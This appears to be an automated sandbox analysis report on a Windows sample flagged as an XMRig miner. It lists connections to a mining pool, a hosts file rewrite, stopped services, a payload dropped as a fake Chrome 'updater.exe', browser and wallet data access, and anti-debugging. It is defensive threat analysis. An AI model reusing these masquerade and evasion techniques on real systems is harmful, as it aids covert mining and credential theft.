NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp

Files

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-08 00:01

Reported

2023-08-08 00:03

Platform

win10v2004-20230703-en

Max time kernel

82s

Max time network

156s

Command Line

C:\Windows\Explorer.EXE

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4476 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 4152 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4152 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3264 wrote to memory of 4640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4640 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 4600 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 5028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 5028 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 1700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3264 wrote to memory of 1700 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 3992 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 376 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2000 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3992 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2852 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 4952 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3848 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3800 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 3800 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2852 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1020 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 764 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4692 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 3460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 3460 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1020 wrote to memory of 4960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe

"C:\Users\Admin\AppData\Local\Temp\cc4d8fc3c02d1706c374f38b4f8074e0.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4476 -ip 4476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4476 -s 1452

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

